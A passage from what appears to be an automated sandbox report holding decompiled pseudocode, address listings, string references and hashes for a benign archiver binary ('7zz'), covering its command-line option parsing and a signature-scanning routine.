							_t35 = _t449 + 0xb;
							 *_t35 =  *(_t449 + 0xb) & 0x00000000;
							__eflags =  *_t35;
						}
					} else {
						 *(_t449 - 0xd) =  *(_t449 - 0xd) & _t206;
					}
					if( *(_t449 + 0xb) != 0) {
						if( *((intOrPtr*)(_t449 - 0x24)) <= 1) {
							L0040FFF2();
						}
						_t441 = 2;
						E00401E26( &(_t447[0x24]),  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)) + 4)));
						if(_t447[0x28] == 0) {
							L0040FFF2();
						}
					}
					_push( *((intOrPtr*)(_t449 - 0x14)));
					_push( *(_t449 - 0x20));
					 *(_t449 - 0x1c) =  &(_t447[0xc]);
					_push( *(_t449 - 0x18));
					_push(_t331 + 8);
					E00410B06(_t441,  &(_t447[0xc]));
					_t447[8] =  *((intOrPtr*)(E004071F7(_t331, 6)));
					_t212 =  *((intOrPtr*)(E004071F7(_t331, 7)));
					_t447[0x30] = _t212;
					if(_t212 != 0) {
						E00401E26( &(_t447[0x34]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 7) + 0x10)))));
					}
					_t447[9] =  *((intOrPtr*)(E004071F7(_t331, 0x18)));
					if( *((char*)(E004071F7(_t331, 5))) != 0) {
						E00401E26( &(_t447[0x168]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 5) + 0x10)))));
					}
					if( *(_t449 - 0xd) == 0) {
						_t216 = L0040FE46( &(_t447[0x20]));
						__eflags = _t216;
						if(_t216 == 0) {
							_t217 = _t447[0x20];
							__eflags = _t217 - 7;
							if(_t217 != 7) {
								__eflags = _t217 - 8;
								if(_t217 != 8) {
									L0040FFF2();
								}
								goto L110;
							}
							_t447[0x17c] = _t447[0x17c] | 0xffffffff;
							_t447[0x180] = _t447[0x180] | 0xffffffff;
							__eflags = _t441 -  *((intOrPtr*)(_t449 - 0x24));
							_t424 =  &(_t447[0x178]);
							_t447[0x178] = 1;
							if(_t441 <  *((intOrPtr*)(_t449 - 0x24))) {
								_t243 = E004119B8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)) + _t441 * 4)))), _t424);
								__eflags = _t243;
								if(_t243 == 0) {
									L0040FFF2();
								}
							}
							_t443 = 0;
							_t220 = E004071F7(_t331, 8);
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) > 0) {
								do {
									E004039C0(_t449 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 8) + 0x10)) + _t443 * 4)));
									 *(_t449 - 4) = 3;
									L00407ED0( *((intOrPtr*)(_t449 - 0x30)));
									__eflags =  *((intOrPtr*)(_t449 - 0x2c)) - 2;
									if( *((intOrPtr*)(_t449 - 0x2c)) < 2) {
										L0040FFF2();
									}
									_t225 =  *((intOrPtr*)(_t449 - 0x30));
									_t357 =  *_t225;
									__eflags = _t357 - 0x44;
									if(_t357 != 0x44) {
										__eflags = _t357 - 0x4d;
										if(_t357 != 0x4d) {
											L100:
											L0040FFF2();
											goto L101;
										}
										__eflags =  *((short*)(_t225 + 2)) - 0x54;
										if( *((short*)(_t225 + 2)) != 0x54) {
											__eflags = _t357 - 0x4d;
											if(_t357 != 0x4d) {
												goto L100;
											}
											__eflags =  *((short*)(_t225 + 2)) - 0x3d;
											if( *((short*)(_t225 + 2)) != 0x3d) {
												goto L100;
											}
											__eflags =  *((short*)(_t225 + 4));
											if( *((short*)(_t225 + 4)) == 0) {
												goto L102;
											}
											_t230 = E004072C9(_t449 - 0x30, _t449 - 0x3c, 2);
											 *(_t449 - 4) = 4;
											E00401E26( &(_t447[0x184]), _t230);
											E00407A18( *((intOrPtr*)(_t449 - 0x3c)));
											goto L101;
										}
										__eflags =  *((short*)(_t225 + 4)) - 0x3d;
										_t363 = 2;
										if( *((short*)(_t225 + 4)) == 0x3d) {
											_t363 = 3;
										}
										__eflags =  *((short*)(_t225 + _t363 * 2));
										_t364 = _t225 + _t363 * 2;
										if( *((short*)(_t225 + _t363 * 2)) == 0) {
											goto L102;
										} else {
											_t233 = E004119B8(_t364,  &(_t447[0x17c]));
											__eflags = _t233;
											if(_t233 != 0) {
												goto L101;
											}
											goto L100;
										}
									} else {
										__eflags =  *((short*)(_t225 + 2)) - 0x3d;
										_t365 = 1;
										if( *((short*)(_t225 + 2)) == 0x3d) {
											_t365 = 2;
										}
										_t234 = E004119B8(_t225 + _t365 * 2, _t449 + 8);
										__eflags = _t234;
										if(_t234 == 0) {
											L0040FFF2();
										}
										__eflags =  *(_t449 + 8) - 0x1f;
										if( *(_t449 + 8) > 0x1f) {
											L0040FFF2();
										}
										_t235 = 1;
										_t447[0x180] = _t235 <<  *(_t449 + 8);
										L101:
										_t225 =  *((intOrPtr*)(_t449 - 0x30));
									}
									L102:
									 *(_t449 - 4) =  *(_t449 - 4) | 0xffffffff;
									E00407A18(_t225);
									_t443 = _t443 + 1;
									_t228 = E004071F7(_t331, 8);
									__eflags = _t443 -  *((intOrPtr*)(_t228 + 0xc));
								} while (_t443 <  *((intOrPtr*)(_t228 + 0xc)));
							}
							goto L110;
						}
						_t444 =  &(_t447[0x90]);
						_push(_t444);
						E0041124B(_t447[0x20], _t331);
						E004117BD(_t331,  &(_t444[4]), __eflags);
						_t247 = E004071F7(_t331, 0x1d);
						__eflags =  *_t247;
						if( *_t247 != 0) {
							_t444[0x98] = 1;
						}
						_t248 = E004071F7(_t331, 4);
						__eflags =  *_t248;
						_t249 = _t248 & 0xffffff00 |  *_t248 == 0x00000000;
						__eflags = _t249;
						_t447[0x174] = _t249;
						if(_t249 == 0) {
							L66:
							_t251 =  *((intOrPtr*)(E004071F7(_t331, 0x17)));
							__eflags = _t251;
							_t444[0xa9] = _t251;
							if(_t251 != 0) {
								E00401E26( &(_t444[0xac]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 0x17) + 0x10)))));
								__eflags = _t444[0xb0];
								if(_t444[0xb0] > 0) {
									__eflags =  *(_t444[0xac]) - 0x2e;
									if( *(_t444[0xac]) == 0x2e) {
										_t444[0xaa] = 1;
										E004075A5( &(_t444[0xac]), 0, 1);
									}
								}
							}
							_t252 =  &(_t444[0xa8]);
							 *_t252 = _t447[6];
							_t253 =  *_t252;
							_t375 = _t447[5];
							__eflags = _t253;
							_t444[0x99] = _t375;
							if(_t253 != 0) {
								__eflags = _t444[0xa9];
								if(_t444[0xa9] != 0) {
									 *(_t449 + 8) = "stdout mode and email mode cannot be combined";
									_t253 = E0046B8F4(_t449 + 8, 0x47cf70);
								}
								__eflags = _t253;
								if(_t253 != 0) {
									__eflags = _t447[3];
									if(_t447[3] != 0) {
										_t258 =  *0x48ba30; // 0x48bab0
										 *(_t449 + 8) = _t258;
										E0046B8F4(_t449 + 8, 0x47d358);
									}
								}
							}
							__eflags = _t375;
							if(_t375 != 0) {
								E00401E26( &(_t444[0x9c]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 0x14) + 0x10)))));
							}
							E00411046( *(_t449 - 0x1c));
							goto L110;
						} else {
							_t268 = _t447[6];
							__eflags = _t268;
							if(_t268 == 0) {
								L64:
								__eflags = _t447[3];
								if(_t447[3] != 0) {
									goto L66;
								}
								L65:
								_t122 =  &(_t447[0x174]);
								 *_t122 = _t447[0x174] & 0x00000000;
								__eflags =  *_t122;
								goto L66;
							}
							__eflags = _t447[4];
							if(_t447[4] == 0) {
								goto L65;
							}
							__eflags = _t268;
							if(_t268 != 0) {
								goto L66;
							}
							goto L64;
						}
					} else {
						_t269 =  *(_t449 - 0x1c);
						if(_t269[8] != 1 ||  *((intOrPtr*)( *(_t269[0xc]) + 4)) != 0) {
							L0040FFFD("Cannot use absolute pathnames for this command");
						}
						E00405B9F(_t449 - 0x50);
						 *((intOrPtr*)(_t449 - 0x50)) = 0x47a680;
						 *(_t449 - 4) =  *(_t449 - 4) & 0x00000000;
						if( *((char*)(E004071F7(_t331, 0xd))) != 0) {
							_push( *((intOrPtr*)(_t449 - 0x14)));
							_push(2);
							_push(1);
							E00410CA4(_t449 - 0x50, E004071F7(_t331, 0xd) + 4);
						}
						if( *((char*)(E004071F7(_t331, 0xe))) != 0) {
							_push( *((intOrPtr*)(_t449 - 0x14)));
							_push(2);
							_push(0);
							E00410CA4(_t449 - 0x50, E004071F7(_t331, 0xe) + 4);
						}
						if( *(_t449 + 0xb) != 0) {
							E00410AC9(_t449 - 0x50,  &(_t447[0x24]), 1, 2);
						}
						E00411046(_t449 - 0x50);
						E0040925B(_t449 - 0x50);
						if(_t447[5] == 0) {
							_push( &(_t447[0x68]));
							E0041003E(_t331, _t449 - 0x50,  &(_t447[0x54]), _t441, __eflags); // executed
						} else {
							E004039C0(_t449 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 0x14) + 0x10)))));
							_push(_t449 - 0x30);
							 *(_t449 - 4) = 1;
							E00406796( &(_t447[0x54]));
							_push(_t449 - 0x30);
							E00406796( &(_t447[0x68]));
							 *(_t449 - 4) =  *(_t449 - 4) & 0x00000000;
							E00407A18( *((intOrPtr*)(_t449 - 0x30)));
						}
						_t483 =  *(_t449 - 0xe);
						if( *(_t449 - 0xe) != 0) {
							E004117BD(_t331,  &(_t447[0x7c]), _t483);
							if(_t447[6] != 0 && _t447[3] != 0 && _t447[4] != 0) {
								_t291 =  *0x48ba34; // 0x48ba74
								 *(_t449 + 8) = _t291;
								E0046B8F4(_t449 + 8, 0x47d358);
							}
							if( *((char*)(E004071F7(_t331, 9))) != 0) {
								E00401E26( &(_t447[0x44]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 9) + 0x10)))));
								L0040BEB9( &(_t447[0x44]));
							}
							_t447[0x50] = _t447[0x50] & 0x00000000;
							if( *((char*)(E004071F7(_t331, 0x16))) == 0) {
								__eflags = _t447[8];
								if(_t447[8] != 0) {
									_t447[0x50] = 1;
								}
							} else {
								_t447[0x50] =  *(0x48b704 +  *(E004071F7(_t331, 0x16) + 0x18) * 4);
							}
						}
						 *((intOrPtr*)(_t449 - 0x50)) = 0x47a680;
						 *(_t449 - 4) = 2;
						E0040862D();
						 *(_t449 - 4) =  *(_t449 - 4) | 0xffffffff;
						E00408604(_t449 - 0x50);
						L110:
						_t218 = E0040925B( *(_t449 - 0x1c));
						 *[fs:0x0] =  *((intOrPtr*)(_t449 - 0xc));
						return _t218;
					}
				}
				_t319 = _t447[0x20];
				if(_t319 == 7 || _t319 == 8) {
					goto L17;
				} else {
					 *(_t449 + 0xb) = 1;
					goto L18;
				}
			}














































                                                                      0x00410362
                                                                      0x0041036b
                                                                      0x0041036f
                                                                      0x00410372
                                                                      0x00410375
                                                                      0x00410378
                                                                      0x0041037a
                                                                      0x0041037a
                                                                      0x00410382
                                                                      0x00410391
                                                                      0x00410393
                                                                      0x00410393
                                                                      0x004103a7
                                                                      0x004103b5
                                                                      0x004103c0
                                                                      0x004103d2
                                                                      0x004103d2
                                                                      0x004103db
                                                                      0x004103e0
                                                                      0x004103e3
                                                                      0x004103fb
                                                                      0x004103e5
                                                                      0x004103f6
                                                                      0x004103f6
                                                                      0x00410402
                                                                      0x00410406
                                                                      0x00410409
                                                                      0x0041040e
                                                                      0x00410415
                                                                      0x00410418
                                                                      0x0041041d
                                                                      0x00410422
                                                                      0x0041042a
                                                                      0x00410435
                                                                      0x00410437
                                                                      0x0041043c
                                                                      0x00410440
                                                                      0x00410443
                                                                      0x00410454
                                                                      0x00410454
                                                                      0x00410465
                                                                      0x00410467
                                                                      0x0041046c
                                                                      0x0041046f
                                                                      0x00410480
                                                                      0x00410480
                                                                      0x00410489
                                                                      0x00410494
                                                                      0x004104a9
                                                                      0x004104a9
                                                                      0x004104a9
                                                                      0x004104a9
                                                                      0x004104ad
                                                                      0x004104b0
                                                                      0x004104b7
                                                                      0x004104ba
                                                                      0x004104c7
                                                                      0x004104cb
                                                                      0x004104cf
                                                                      0x004104d1
                                                                      0x004104d1
                                                                      0x004104d1
                                                                      0x004104d1
                                                                      0x004104c2
                                                                      0x004104c2
                                                                      0x004104c2
                                                                      0x004104d9
                                                                      0x004104df
                                                                      0x004104e1
                                                                      0x004104e1
                                                                      0x004104eb
                                                                      0x004104f2
                                                                      0x004104fb
                                                                      0x004104fd
                                                                      0x004104fd
                                                                      0x004104fb
                                                                      0x00410502
                                                                      0x0041050d
                                                                      0x00410510
                                                                      0x00410513
                                                                      0x00410516
                                                                      0x00410517
                                                                      0x0041052b
                                                                      0x00410533
                                                                      0x00410537
                                                                      0x0041053a
                                                                      0x0041054d
                                                                      0x0041054d
                                                                      0x00410561
                                                                      0x0041056c
                                                                      0x00410582
                                                                      0x00410582
                                                                      0x0041058b
                                                                      0x0041075e
                                                                      0x00410763
                                                                      0x00410765
                                                                      0x004108ae
                                                                      0x004108b1
                                                                      0x004108b4
                                                                      0x00410a16
                                                                      0x00410a19
                                                                      0x00410a1b
                                                                      0x00410a1b
                                                                      0x00000000
                                                                      0x00410a19
                                                                      0x004108ba
                                                                      0x004108c1
                                                                      0x004108c8
                                                                      0x004108cb
                                                                      0x004108d1
                                                                      0x004108d7
                                                                      0x004108e3
                                                                      0x004108e8
                                                                      0x004108ea
                                                                      0x004108ec
                                                                      0x004108ec
                                                                      0x004108ea
                                                                      0x004108f5
                                                                      0x004108f7
                                                                      0x004108fc
                                                                      0x004108ff
                                                                      0x00410905
                                                                      0x00410917
                                                                      0x0041091f
                                                                      0x00410926
                                                                      0x0041092b
                                                                      0x0041092f
                                                                      0x00410931
                                                                      0x00410931
                                                                      0x00410936
                                                                      0x00410939
                                                                      0x0041093c
                                                                      0x00410940
                                                                      0x0041097e
                                                                      0x00410982
                                                                      0x004109b1
                                                                      0x004109b1
                                                                      0x00000000
                                                                      0x004109b1
                                                                      0x00410984
                                                                      0x00410989
                                                                      0x004109d9
                                                                      0x004109dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004109df
                                                                      0x004109e4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004109e6
                                                                      0x004109eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004109f6
                                                                      0x00410a02
                                                                      0x00410a06
                                                                      0x00410a0e
                                                                      0x00000000
                                                                      0x00410a13
                                                                      0x0041098b
                                                                      0x00410992
                                                                      0x00410993
                                                                      0x00410997
                                                                      0x00410997
                                                                      0x00410998
                                                                      0x0041099d
                                                                      0x004109a0
                                                                      0x00000000
                                                                      0x004109a2
                                                                      0x004109a8
                                                                      0x004109ad
                                                                      0x004109af
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004109af
                                                                      0x00410942
                                                                      0x00410942
                                                                      0x00410949
                                                                      0x0041094a
                                                                      0x0041094e
                                                                      0x0041094e
                                                                      0x00410955
                                                                      0x0041095a
                                                                      0x0041095c
                                                                      0x0041095e
                                                                      0x0041095e
                                                                      0x00410963
                                                                      0x00410967
                                                                      0x00410969
                                                                      0x00410969
                                                                      0x00410973
                                                                      0x00410976
                                                                      0x004109b6
                                                                      0x004109b6
                                                                      0x004109b6
                                                                      0x004109b9
                                                                      0x004109b9
                                                                      0x004109be
                                                                      0x004109c4
                                                                      0x004109c9
                                                                      0x004109ce
                                                                      0x004109ce
                                                                      0x004109d7
                                                                      0x00000000
                                                                      0x004108ff
                                                                      0x0041076e
                                                                      0x00410774
                                                                      0x00410777
                                                                      0x00410781
                                                                      0x0041078a
                                                                      0x0041078f
                                                                      0x00410792
                                                                      0x00410794
                                                                      0x00410794
                                                                      0x0041079f
                                                                      0x004107a4
                                                                      0x004107a7
                                                                      0x004107aa
                                                                      0x004107ac
                                                                      0x004107b2
                                                                      0x004107d2
                                                                      0x004107db
                                                                      0x004107dd
                                                                      0x004107df
                                                                      0x004107e5
                                                                      0x004107fc
                                                                      0x00410801
                                                                      0x00410808
                                                                      0x00410810
                                                                      0x00410814
                                                                      0x00410820
                                                                      0x00410827
                                                                      0x00410827
                                                                      0x00410814
                                                                      0x00410808
                                                                      0x0041082f
                                                                      0x00410835
                                                                      0x00410837
                                                                      0x00410839
                                                                      0x0041083c
                                                                      0x0041083e
                                                                      0x00410844
                                                                      0x00410846
                                                                      0x0041084d
                                                                      0x00410858
                                                                      0x0041085f
                                                                      0x0041085f
                                                                      0x00410864
                                                                      0x00410866
                                                                      0x00410868
                                                                      0x0041086c
                                                                      0x0041086e
                                                                      0x00410878
                                                                      0x0041087f
                                                                      0x0041087f
                                                                      0x0041086c
                                                                      0x00410866
                                                                      0x00410884
                                                                      0x00410886
                                                                      0x0041089c
                                                                      0x0041089c
                                                                      0x004108a4
                                                                      0x00000000
                                                                      0x004107b4
                                                                      0x004107b4
                                                                      0x004107b7
                                                                      0x004107b9
                                                                      0x004107c5
                                                                      0x004107c5
                                                                      0x004107c9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004107cb
                                                                      0x004107cb
                                                                      0x004107cb
                                                                      0x004107cb
                                                                      0x00000000
                                                                      0x004107cb
                                                                      0x004107bb
                                                                      0x004107bf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004107c1
                                                                      0x004107c3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004107c3
                                                                      0x00410591
                                                                      0x00410591
                                                                      0x00410598
                                                                      0x004105aa
                                                                      0x004105aa
                                                                      0x004105b2
                                                                      0x004105b7
                                                                      0x004105be
                                                                      0x004105ce
                                                                      0x004105d0
                                                                      0x004105d5
                                                                      0x004105d7
                                                                      0x004105e8
                                                                      0x004105e8
                                                                      0x004105f9
                                                                      0x004105fb
                                                                      0x00410600
                                                                      0x00410602
                                                                      0x00410613
                                                                      0x00410613
                                                                      0x0041061c
                                                                      0x00410628
                                                                      0x00410628
                                                                      0x00410630
                                                                      0x00410638
                                                                      0x00410641
                                                                      0x0041068a
                                                                      0x0041068e
                                                                      0x00410643
                                                                      0x00410654
                                                                      0x0041065f
                                                                      0x00410660
                                                                      0x00410664
                                                                      0x0041066f
                                                                      0x00410670
                                                                      0x00410678
                                                                      0x0041067c
                                                                      0x00410681
                                                                      0x00410693
                                                                      0x00410697
                                                                      0x004106a2
                                                                      0x004106ab
                                                                      0x004106b9
                                                                      0x004106c3
                                                                      0x004106ca
                                                                      0x004106ca
                                                                      0x004106db
                                                                      0x004106f1
                                                                      0x004106f8
                                                                      0x004106f8
                                                                      0x004106fd
                                                                      0x0041070d
                                                                      0x00410727
                                                                      0x0041072b
                                                                      0x0041072d
                                                                      0x0041072d
                                                                      0x0041070f
                                                                      0x00410722
                                                                      0x00410722
                                                                      0x0041070d
                                                                      0x00410734
                                                                      0x0041073e
                                                                      0x00410745
                                                                      0x0041074a
                                                                      0x00410751
                                                                      0x00410a20
                                                                      0x00410a23
                                                                      0x00410a2e
                                                                      0x00410a36
                                                                      0x00410a36
                                                                      0x0041058b
                                                                      0x00410496
                                                                      0x0041049c
                                                                      0x00000000
                                                                      0x004104a3
                                                                      0x004104a3
                                                                      0x00000000
                                                                      0x004104a3

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00410362
                                                                        • Part of subcall function 0041003E: __EH_prolog.LIBCMT ref: 00410043
                                                                      Strings
                                                                      • 59@, xrefs: 0041036E
                                                                      • Cannot use absolute pathnames for this command, xrefs: 004105A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: 59@$Cannot use absolute pathnames for this command
                                                                      • API String ID: 3519838083-753490679
                                                                      • Opcode ID: 1d0b522b18515802e249ba63502b82e806ed444de2582f4dd8cd52e64bc5bade
                                                                      • Instruction ID: 8adad491b5bf5222f818b6dcdc2d6027f4997ee1019a1a956a15da55c14c090b
                                                                      • Opcode Fuzzy Hash: 1d0b522b18515802e249ba63502b82e806ed444de2582f4dd8cd52e64bc5bade
                                                                      • Instruction Fuzzy Hash: D022C330A043849EDB25EB65C851BEE7BA1AF45308F04446FE1562F2D3CBBCA9C8C759
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042D33C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2721 42d33c-42d35a call 46b890 call 40fac0 2725 42d35f-42d361 2721->2725 2726 42d367-42d370 call 42d51a 2725->2726 2727 42d4cc-42d4da 2725->2727 2730 42d372-42d374 2726->2730 2731 42d379-42d3af call 40fa26 call 46c5c0 2726->2731 2730->2727 2736 42d3b2-42d3b7 2731->2736 2737 42d3d6-42d3f8 2736->2737 2738 42d3b9-42d3c6 2736->2738 2744 42d4b8 2737->2744 2745 42d3fe-42d406 2737->2745 2739 42d47c-42d47f 2738->2739 2740 42d3cc 2738->2740 2742 42d4ba-42d4ca call 407a18 2739->2742 2740->2737 2743 42d3ce-42d3d0 2740->2743 2742->2727 2743->2737 2743->2739 2744->2742 2745->2739 2747 42d408-42d40c 2745->2747 2747->2737 2749 42d40e-42d41e 2747->2749 2750 42d420 2749->2750 2751 42d477-42d47a 2749->2751 2752 42d428 2750->2752 2753 42d45b-42d472 call 46bab0 2751->2753 2755 42d42b-42d42f 2752->2755 2753->2736 2757 42d431-42d433 2755->2757 2758 42d43b 2755->2758 2759 42d435-42d439 2757->2759 2760 42d43d 2757->2760 2758->2760 2759->2755 2760->2753 2761 42d43f-42d448 call 42d4dd 2760->2761 2764 42d481-42d4b4 call 46c5c0 2761->2764 2765 42d44a-42d453 2761->2765 2764->2744 2766 42d422-42d425 2765->2766 2767 42d455-42d458 2765->2767 2766->2752 2767->2753
                                                                      C-Code - Quality: 95%
                                                                      			E0042D33C(void* __ecx, void* __eflags) {
				intOrPtr _t57;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr* _t75;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr _t85;
				intOrPtr _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;

				E0046B890(E004774D0, _t116);
				_t119 = _t118 - 0x20;
				_t113 = __ecx;
				_t83 = __ecx + 0x28;
				_t107 = 0x20;
				_t57 = E0040FAC0(__eflags, _t107); // executed
				if(_t57 == 0) {
					if(E0042D51A(_t83) == 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t116 - 0x2c)) = 0x47a7ec;
						 *((intOrPtr*)(_t116 - 0x28)) = 0;
						 *((intOrPtr*)(_t116 - 0x24)) = 0;
						 *((intOrPtr*)(_t116 - 4)) = 0;
						E0040FA26(_t116 - 0x2c, 0x10000);
						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
						E0046C5C0( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
						_t109 =  *((intOrPtr*)(_t113 + 0x20));
						_t85 =  *((intOrPtr*)(_t113 + 0x24));
						_t121 = _t119 + 0xc;
						while(1) {
							L4:
							_t100 =  *((intOrPtr*)(_t116 + 0xc));
							__eflags = _t100;
							if(_t100 == 0) {
								goto L8;
							}
							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
							asm("sbb eax, [esi+0x24]");
							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
							if(__eflags > 0) {
								L25:
								_t115 = 1;
							} else {
								if(__eflags < 0) {
									goto L8;
								} else {
									__eflags = _t95 -  *_t100;
									if(_t95 >  *_t100) {
										goto L25;
									} else {
										while(1) {
											L8:
											_t65 =  *((intOrPtr*)(_t116 - 0x10));
											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
											__eflags = _t67;
											if(_t67 != 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t116 - 0x20));
											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
											__eflags = _t69;
											if(_t69 == 0) {
												goto L25;
											} else {
												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
													continue;
												} else {
													_t104 = 0;
													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
													 *((intOrPtr*)(_t116 - 0x14)) = 0;
													__eflags = _t71;
													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
													if(_t71 <= 0) {
														_t93 =  *((intOrPtr*)(_t116 - 0x18));
														goto L23;
													} else {
														while(1) {
															_t93 =  *((intOrPtr*)(_t116 - 0x18));
															while(1) {
																L15:
																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
																if( *((char*)(_t104 + _t93)) == 0x37) {
																	break;
																}
																__eflags = _t104 - _t71;
																if(__eflags < 0) {
																	_t104 = _t104 + 1;
																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
																	continue;
																}
																L19:
																if(__eflags == 0) {
																	L23:
																	_t109 = _t109 + _t71;
																	asm("adc ebx, 0x0");
																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
																	E0046BAB0(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
																	_t121 = _t121 + 0xc;
																	goto L4;
																} else {
																	_t75 = E0042D4DD(_t93 + _t104);
																	__eflags = _t75;
																	if(_t75 != 0) {
																		E0046C5C0(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
																		_t80 =  *((intOrPtr*)(_t116 + 8));
																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
																		_t98 = 0;
																		asm("adc ebx, ecx");
																		_t111 = _t110 + 0x20;
																		__eflags = _t111;
																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
																		asm("adc ebx, ecx");
																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
																		goto L27;
																	} else {
																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			continue;
																		} else {
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			goto L23;
																		}
																	}
																}
																goto L28;
															}
															__eflags = _t104 - _t71;
															goto L19;
														}
													}
												}
											}
											goto L28;
										}
										L27:
										_t115 = _t67;
									}
								}
							}
							L28:
							 *((intOrPtr*)(_t116 - 0x2c)) = 0x47a7ec;
							E00407A18( *((intOrPtr*)(_t116 - 0x24)));
							_t57 = _t115;
							goto L29;
						}
					} else {
						_t57 = 0;
					}
				}
				L29:
				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
				return _t57;
			}



























                                                                      0x0042d341
                                                                      0x0042d346
                                                                      0x0042d34c
                                                                      0x0042d353
                                                                      0x0042d356
                                                                      0x0042d35a
                                                                      0x0042d361
                                                                      0x0042d370
                                                                      0x0042d379
                                                                      0x0042d37b
                                                                      0x0042d382
                                                                      0x0042d385
                                                                      0x0042d390
                                                                      0x0042d393
                                                                      0x0042d39e
                                                                      0x0042d3a1
                                                                      0x0042d3a4
                                                                      0x0042d3a9
                                                                      0x0042d3ac
                                                                      0x0042d3af
                                                                      0x0042d3b2
                                                                      0x0042d3b2
                                                                      0x0042d3b2
                                                                      0x0042d3b5
                                                                      0x0042d3b7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042d3bd
                                                                      0x0042d3c0
                                                                      0x0042d3c3
                                                                      0x0042d3c6
                                                                      0x0042d47c
                                                                      0x0042d47e
                                                                      0x0042d3cc
                                                                      0x0042d3cc
                                                                      0x00000000
                                                                      0x0042d3ce
                                                                      0x0042d3ce
                                                                      0x0042d3d0
                                                                      0x00000000
                                                                      0x0042d3d6
